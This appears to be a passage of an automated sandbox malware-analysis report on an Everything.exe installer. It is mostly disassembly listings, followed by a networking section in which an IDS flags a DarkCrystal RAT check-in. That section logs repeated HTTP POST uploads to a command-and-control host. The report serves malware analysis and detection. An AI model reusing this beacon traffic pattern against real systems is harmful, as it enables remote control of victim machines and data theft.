                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [r9]6_2_00007FF63D5E57E0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then test al, al6_2_00007FF63D4B57E0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then test al, al6_2_00007FF63D4B57E0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rcx, rax6_2_00007FF63D48C7E0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [rbx]6_2_00007FF63D4DDA90
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then add rbx, 01h6_2_00007FF63D5FC290
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [rcx]6_2_00007FF63D5FC290
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then test cl, cl6_2_00007FF63D480260
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r15+08h]6_2_00007FF63D5202E0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r15+30h]6_2_00007FF63D5202E0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov qword ptr [rcx], rdi6_2_00007FF63D48C2F0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov ecx, r9d6_2_00007FF63D5EE990
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then test r14d, r14d6_2_00007FF63D5EE990
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r8]6_2_00007FF63D482940
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r13+00000088h]6_2_00007FF63D482940
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov word ptr [r9+04h], r12w6_2_00007FF63D5EF940
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov eax, edx6_2_00007FF63D5EF940
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [rcx+rdi]6_2_00007FF63D5EF940
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rax]6_2_00007FF63D472A10
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000002B8h]6_2_00007FF63D499A30
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then add rax, 01h6_2_00007FF63D4B7220
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then lea ecx, dword ptr [rdx+r9]6_2_00007FF63D5F11C0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov dword ptr [rax+18h], 00000001h6_2_00007FF63D485C80
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov r8, rdi6_2_00007FF63D485C80
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov eax, r8d6_2_00007FF63D496CA0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov r8d, dword ptr [rsp+30h]6_2_00007FF63D497C50
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then test al, al6_2_00007FF63D479C50
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov eax, r11d6_2_00007FF63D5DCC70
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov ebx, ebp6_2_00007FF63D475440
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rdi+30h]6_2_00007FF63D4B9470
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r14]6_2_00007FF63D472C70
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rdx]6_2_00007FF63D471460
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [rbp+00h]6_2_00007FF63D47CCC0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then movsxd r8, qword ptr [r10+74h]6_2_00007FF63D5F1BB0
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rdi]6_2_00007FF63D4DE380
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rax+00000408h]6_2_00007FF63D480B80
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then add rbx, 01h6_2_00007FF63D55A380
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then xor edx, edx6_2_00007FF63D553350
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 4x nop then mov eax, r9d6_2_00007FF63D471C20
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [rbp+00h]7_2_00007FF728BBCCC0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rdx+r8]7_2_00007FF728C7B440
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then add rcx, 01h7_2_00007FF728BBB7B0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rax]7_2_00007FF728BB2A10
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then lea ecx, dword ptr [rdx+r9]7_2_00007FF728D311C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov ecx, r9d7_2_00007FF728D2E990
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test r14d, r14d7_2_00007FF728D2E990
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [rsp+r8+000001D0h]7_2_00007FF728C07920
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov word ptr [r9+04h], r12w7_2_00007FF728D2F940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov eax, edx7_2_00007FF728D2F940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [rcx+rdi]7_2_00007FF728D2F940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r8]7_2_00007FF728BC2940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r13+00000088h]7_2_00007FF728BC2940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then add rcx, 01h7_2_00007FF728D26920
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov qword ptr [rcx], rdi7_2_00007FF728BCC2F0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r15+08h]7_2_00007FF728C602E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r15+30h]7_2_00007FF728C602E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test cl, cl7_2_00007FF728BC0260
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then add rbx, 01h7_2_00007FF728D3C290
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [rcx]7_2_00007FF728D3C290
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [rbx]7_2_00007FF728C1DA90
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then add rax, 01h7_2_00007FF728BF7220
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000002B8h]7_2_00007FF728BD9A30
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movsxd r8, qword ptr [r10+74h]7_2_00007FF728D31BB0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rax+00000408h]7_2_00007FF728BC0B80
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then add rbx, 01h7_2_00007FF728C9A380
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rdi]7_2_00007FF728C1E380
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then xor edx, edx7_2_00007FF728C93350
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov eax, r8d7_2_00007FF728BD6CA0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rdx]7_2_00007FF728BB1460
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r14]7_2_00007FF728BB2C70
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rdi+30h]7_2_00007FF728BF9470
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov dword ptr [rax+18h], 00000001h7_2_00007FF728BC5C80
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov r8, rdi7_2_00007FF728BC5C80
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov eax, r11d7_2_00007FF728D1CC70
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov eax, r9d7_2_00007FF728BB1C20
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov ebx, ebp7_2_00007FF728BB5440
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al7_2_00007FF728BB9C50
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov r8d, dword ptr [rsp+30h]7_2_00007FF728BD7C50
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov r8d, 00000001h7_2_00007FF728BFDDA0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [rbx]7_2_00007FF728C0E550
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]7_2_00007FF728BD9EB0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al7_2_00007FF728BF56C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al7_2_00007FF728BF56C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movsxd rdx, qword ptr [rbx+74h]7_2_00007FF728D34E40
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al7_2_00007FF728C95E20
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, rax7_2_00007FF728BCC7E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al7_2_00007FF728BF57E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al7_2_00007FF728BF57E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000178h]7_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000001C8h]7_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000218h]7_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000268h]7_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000150h]7_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000001A0h]7_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000001F0h]7_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000240h]7_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000290h]7_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000002B8h]7_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [r9]7_2_00007FF728D257E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rsi, qword ptr [r15]7_2_00007FF728BEDF60
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test r10d, r10d7_2_00007FF728BBDF80
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rdi+20h]7_2_00007FF728BB8790
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rbx]7_2_00007FF728C1DF30
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [r8]7_2_00007FF728D42F50
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx r8d, word ptr [r9]7_2_00007FF728D26720
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [r10]7_2_00007FF728C618A0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r8]7_2_00007FF728C618A0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then cmp rcx, 0000000000000100h7_2_00007FF728BCB860
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov qword ptr [rcx], rbx7_2_00007FF728BCB860
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rax]7_2_00007FF728BCB860
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov qword ptr [rcx], rdi7_2_00007FF728BCB860
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov r9, qword ptr [r11+08h]7_2_00007FF728BB8830
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r9]7_2_00007FF728C13850
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rdi+000000A8h]7_2_00007FF728C13850
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [r8]7_2_00007FF728C13850
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [r9+rdx]7_2_00007FF728C7F850
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then lea rcx, qword ptr [rsp+000002A0h]7_2_00007FF728C82840
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [rbp+00h]10_2_00007FF728BBCCC0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rdx+r8]10_2_00007FF728C7B440
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then add rcx, 01h10_2_00007FF728BBB7B0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rax]10_2_00007FF728BB2A10
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then lea ecx, dword ptr [rdx+r9]10_2_00007FF728D311C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov ecx, r9d10_2_00007FF728D2E990
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test r14d, r14d10_2_00007FF728D2E990
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [rsp+r8+000001D0h]10_2_00007FF728C07920
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov word ptr [r9+04h], r12w10_2_00007FF728D2F940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov eax, edx10_2_00007FF728D2F940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [rcx+rdi]10_2_00007FF728D2F940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r8]10_2_00007FF728BC2940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r13+00000088h]10_2_00007FF728BC2940
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then add rcx, 01h10_2_00007FF728D26920
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov qword ptr [rcx], rdi10_2_00007FF728BCC2F0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r15+08h]10_2_00007FF728C602E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r15+30h]10_2_00007FF728C602E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test cl, cl10_2_00007FF728BC0260
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then add rbx, 01h10_2_00007FF728D3C290
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [rcx]10_2_00007FF728D3C290
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [rbx]10_2_00007FF728C1DA90
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then add rax, 01h10_2_00007FF728BF7220
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000002B8h]10_2_00007FF728BD9A30
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movsxd r8, qword ptr [r10+74h]10_2_00007FF728D31BB0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rax+00000408h]10_2_00007FF728BC0B80
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then add rbx, 01h10_2_00007FF728C9A380
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rdi]10_2_00007FF728C1E380
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then xor edx, edx10_2_00007FF728C93350
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov eax, r8d10_2_00007FF728BD6CA0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rdx]10_2_00007FF728BB1460
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r14]10_2_00007FF728BB2C70
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rdi+30h]10_2_00007FF728BF9470
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov dword ptr [rax+18h], 00000001h10_2_00007FF728BC5C80
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov r8, rdi10_2_00007FF728BC5C80
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov eax, r11d10_2_00007FF728D1CC70
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov eax, r9d10_2_00007FF728BB1C20
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov ebx, ebp10_2_00007FF728BB5440
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al10_2_00007FF728BB9C50
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov r8d, dword ptr [rsp+30h]10_2_00007FF728BD7C50
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov r8d, 00000001h10_2_00007FF728BFDDA0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [rbx]10_2_00007FF728C0E550
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]10_2_00007FF728BD9EB0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al10_2_00007FF728BF56C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al10_2_00007FF728BF56C0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movsxd rdx, qword ptr [rbx+74h]10_2_00007FF728D34E40
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al10_2_00007FF728C95E20
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, rax10_2_00007FF728BCC7E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al10_2_00007FF728BF57E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test al, al10_2_00007FF728BF57E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000178h]10_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000001C8h]10_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000218h]10_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000268h]10_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000150h]10_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000001A0h]10_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000001F0h]10_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000240h]10_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+00000290h]10_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rsi+000002B8h]10_2_00007FF728BBE800
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [r9]10_2_00007FF728D257E0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rsi, qword ptr [r15]10_2_00007FF728BEDF60
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then test r10d, r10d10_2_00007FF728BBDF80
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [rdi+20h]10_2_00007FF728BB8790
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rbx]10_2_00007FF728C1DF30
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [r8]10_2_00007FF728D42F50
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx r8d, word ptr [r9]10_2_00007FF728D26720
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rdx, qword ptr [r10]10_2_00007FF728C618A0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r8]10_2_00007FF728C618A0
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then cmp rcx, 0000000000000100h10_2_00007FF728BCB860
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov qword ptr [rcx], rbx10_2_00007FF728BCB860
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rax]10_2_00007FF728BCB860
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov qword ptr [rcx], rdi10_2_00007FF728BCB860
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov r9, qword ptr [r11+08h]10_2_00007FF728BB8830
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [r9]10_2_00007FF728C13850
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rax, qword ptr [rdi+000000A8h]10_2_00007FF728C13850
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then mov rcx, qword ptr [r8]10_2_00007FF728C13850
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then movzx eax, byte ptr [r9+rdx]10_2_00007FF728C7F850
                                Source: C:\Program Files\Everything\Everything.exeCode function: 4x nop then lea rcx, qword ptr [rsp+000002A0h]10_2_00007FF728C82840

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49853 -> 104.21.112.1:80
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 384Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 1816Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 268532Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 838596cm.nyafka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
